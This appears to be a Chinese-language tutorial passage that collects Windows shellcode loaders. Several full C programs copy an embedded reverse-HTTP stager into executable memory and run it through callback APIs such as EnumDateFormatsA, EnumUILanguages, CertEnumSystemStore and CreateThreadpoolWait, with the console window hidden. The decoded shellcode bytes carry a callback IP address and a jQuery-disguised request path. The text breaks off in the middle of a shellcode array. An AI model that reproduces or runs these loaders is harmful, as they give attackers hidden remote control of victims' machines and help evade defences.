unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6a\x71\x75\x65\x72\x79\x2d\x33\x2e\x33\x2e\x32\x2e\x73\x6c\x69\x6d\x2e\x6d\x69\x6e\x2e\x6a\x73\x00\x17\x83\x47\x19\x26\xd4\x3b\x55\x5a\x7f\x2f\x8a\x88\xf6\xb1\x6c\x22\x27\xf8\xf9\x0c\x22\x1f\x59\xae\x17\x6b\xcb\xca\xf8\x66\x6f\xdd\xbb\xeb\x98\x68\xa1\xc7\x35\x29\x88\xd6\xee\xa5\xb9\x5b\x80\x7f\xec\xf4\x1b\xd7\x00\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6f\x64\x65\x2e\x6a\x71\x75\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x33\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x0d\x0a\x00\xd0\xdb\x73\xdc\x21\x32\x0b\x41\x4e\x68\x98\xc1\xdf\x00\xeb\x83\xa4\x7d\x01\x3e\x15\xe3\x61\x1d\xd1\x02\xa6\x2c\x38\xa7\x58\x70\x0d\x1c\x2a\x6d\x4a\x30\x41\x39\x28\x6a\x41\xeb\x44\xa7\x49\xbe\x52\x97\xe8\x11\x2f\x7f\xc0\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\xaf\x0f\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x2e\x31\x33\x30\x00\x00\x01\x86\xa0";
void main() {// 使用VirtualAlloc 函数申请一个 shellcode字节大小的可以执行代码的内存块LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);// 把shellcode拷贝到这块内存memcpy(addr, sc, sizeof(sc));// 使用回调函数调用执行 EnumDateFormatsA((DATEFMT_ENUMPROCA)addr, NULL, NULL);
}
// 关于EnumDateFormatsA的函数参数
// 除了回调函数的指针 , 无脑强转一下 , 其他全NULL
// 除了VirtualAlloc,也可以尝试修改内存属性,定义数据段等方法。

EnumUILanguages函数:

#include <Windows.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6a\x71\x75\x65\x72\x79\x2d\x33\x2e\x33\x2e\x32\x2e\x73\x6c\x69\x6d\x2e\x6d\x69\x6e\x2e\x6a\x73\x00\x17\x83\x47\x19\x26\xd4\x3b\x55\x5a\x7f\x2f\x8a\x88\xf6\xb1\x6c\x22\x27\xf8\xf9\x0c\x22\x1f\x59\xae\x17\x6b\xcb\xca\xf8\x66\x6f\xdd\xbb\xeb\x98\x68\xa1\xc7\x35\x29\x88\xd6\xee\xa5\xb9\x5b\x80\x7f\xec\xf4\x1b\xd7\x00\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6f\x64\x65\x2e\x6a\x71\x75\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x33\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x0d\x0a\x00\xd0\xdb\x73\xdc\x21\x32\x0b\x41\x4e\x68\x98\xc1\xdf\x00\xeb\x83\xa4\x7d\x01\x3e\x15\xe3\x61\x1d\xd1\x02\xa6\x2c\x38\xa7\x58\x70\x0d\x1c\x2a\x6d\x4a\x30\x41\x39\x28\x6a\x41\xeb\x44\xa7\x49\xbe\x52\x97\xe8\x11\x2f\x7f\xc0\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\xaf\x0f\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x2e\x31\x33\x30\x00\x00\x01\x86\xa0";
int main() {// 使用VirtualAlloc 函数申请一个 shellcode字节大小的可以执行代码的内存块LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);// 把shellcode拷贝到这块内存memcpy(addr, sc, sizeof(sc));// 回调函数调用执行EnumUILanguages((UILANGUAGE_ENUMPROC)addr, 0, 0);
}

CertEnumSystemStore函数:

#include<Windows.h>
#include<stdio.h>
#include <Wincrypt.h> // 需要导入
#pragma comment(lib, "crypt32.lib") // 需要导入
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6a\x71\x75\x65\x72\x79\x2d\x33\x2e\x33\x2e\x32\x2e\x73\x6c\x69\x6d\x2e\x6d\x69\x6e\x2e\x6a\x73\x00\x17\x83\x47\x19\x26\xd4\x3b\x55\x5a\x7f\x2f\x8a\x88\xf6\xb1\x6c\x22\x27\xf8\xf9\x0c\x22\x1f\x59\xae\x17\x6b\xcb\xca\xf8\x66\x6f\xdd\xbb\xeb\x98\x68\xa1\xc7\x35\x29\x88\xd6\xee\xa5\xb9\x5b\x80\x7f\xec\xf4\x1b\xd7\x00\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6f\x64\x65\x2e\x6a\x71\x75\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x33\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x0d\x0a\x00\xd0\xdb\x73\xdc\x21\x32\x0b\x41\x4e\x68\x98\xc1\xdf\x00\xeb\x83\xa4\x7d\x01\x3e\x15\xe3\x61\x1d\xd1\x02\xa6\x2c\x38\xa7\x58\x70\x0d\x1c\x2a\x6d\x4a\x30\x41\x39\x28\x6a\x41\xeb\x44\xa7\x49\xbe\x52\x97\xe8\x11\x2f\x7f\xc0\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\xaf\x0f\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x2e\x31\x33\x30\x00\x00\x01\x86\xa0";void main() {LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);if (addr == NULL) {return;}memcpy(addr, sc, sizeof(sc));CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, 0, 0,(PFN_CERT_ENUM_SYSTEM_STORE)addr);
}
其他回调函数

CertEnumSystemStore

CertEnumSystemStoreLocation

CreateThreadPoolWait

CreateTimerQueueTimer_Tech

CryptEnumOIDInfo

EnumCalendarInfo

EnumCalendarInfoEX

五.创建线程池

CreateThreadpoolWait函数

  • 介绍:用于创建一个线程池等待对象的函数,程池等待对象允许您在等待内核对象(如事件、信号量等)变为有信号状态时执行特定的回调函数。

  • 语法格式:

    • PTP_WAIT CreateThreadpoolWait(PTP_WAIT_CALLBACK pfnwa, //指向回调函数的指针PVOID pv, //传递给回调函数的参数PTP_CALLBACK_ENVIRON pcbe //指向线程池回调环境的指针,置NULL则表使用默认的环境
      );
      

SetThreadpoolWait函数:

  • 介绍:用于线程池中添加等待对象的函数。当等待的内核对象(如事件、信号量等)变为有信号状态时,线程池会调用与等待对象关联的回调函数。

  • 语法格式:

    • VOID SetThreadpoolWait(PTP_WAIT pwa, //指向要添加到线程池的等待对象的指针HANDLE hObject, //要等待的内核对象的句柄,当这个内核对象变为有信号状态时,线程池会调用与等待对象关联的回调函数PFILETIME pftTimeout //指向一个FILETIME结构的指针,表示等待超时的时间
      );
      
#include<Windows.h>
#include<stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6a\x71\x75\x65\x72\x79\x2d\x33\x2e\x33\x2e\x32\x2e\x73\x6c\x69\x6d\x2e\x6d\x69\x6e\x2e\x6a\x73\x00\x17\x83\x47\x19\x26\xd4\x3b\x55\x5a\x7f\x2f\x8a\x88\xf6\xb1\x6c\x22\x27\xf8\xf9\x0c\x22\x1f\x59\xae\x17\x6b\xcb\xca\xf8\x66\x6f\xdd\xbb\xeb\x98\x68\xa1\xc7\x35\x29\x88\xd6\xee\xa5\xb9\x5b\x80\x7f\xec\xf4\x1b\xd7\x00\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6f\x64\x65\x2e\x6a\x71\x75\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x33\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x0d\x0a\x00\xd0\xdb\x73\xdc\x21\x32\x0b\x41\x4e\x68\x98\xc1\xdf\x00\xeb\x83\xa4\x7d\x01\x3e\x15\xe3\x61\x1d\xd1\x02\xa6\x2c\x38\xa7\x58\x70\x0d\x1c\x2a\x6d\x4a\x30\x41\x39\x28\x6a\x41\xeb\x44\xa7\x49\xbe\x52\x97\xe8\x11\x2f\x7f\xc0\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\xaf\x0f\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x2e\x31\x33\x30\x00\x00\x01\x86\xa0";
void main() {// 定义一个DWORD变量,用于存储原始内存保护属性DWORD oldProtect;// 修改shellcode所在内存的保护属性为可读、可写、可执行VirtualProtect((LPVOID)sc, sizeof(sc), PAGE_EXECUTE_READWRITE, &oldProtect);// 创建一个事件对象,初始状态为有信号状态,使用默认安全属性,非手动重置,无名称HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);// 创建一个线程池等待对象,关联到shellcode作为回调函数,回调函数参数和线程池环境为NULLPTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)(LPVOID)sc,NULL, NULL);// 将等待对象添加到线程池中,当事件对象event触发(变为有信号状态)时,线程池会调用与threadPoolWait关联的回调函数SetThreadpoolWait(threadPoolWait, event, NULL);// 等待事件对象变为无信号状态(表示shellcode执行完毕),无限等待WaitForSingleObject(event, INFINITE);
}

六.创建纤程

介绍

  • 纤程(Fiber)是一种轻量级的线程,也被称为协程(Coroutine)或微线程(Microthread)。它们是一种用户级别的线程,由程序自身管理,而不是由操作系统内核管理。纤程是一种可以提高程序执行效率的调度机制,特别适用于需要大量并发执行任务的场景。
#include<Windows.h>
#include<stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\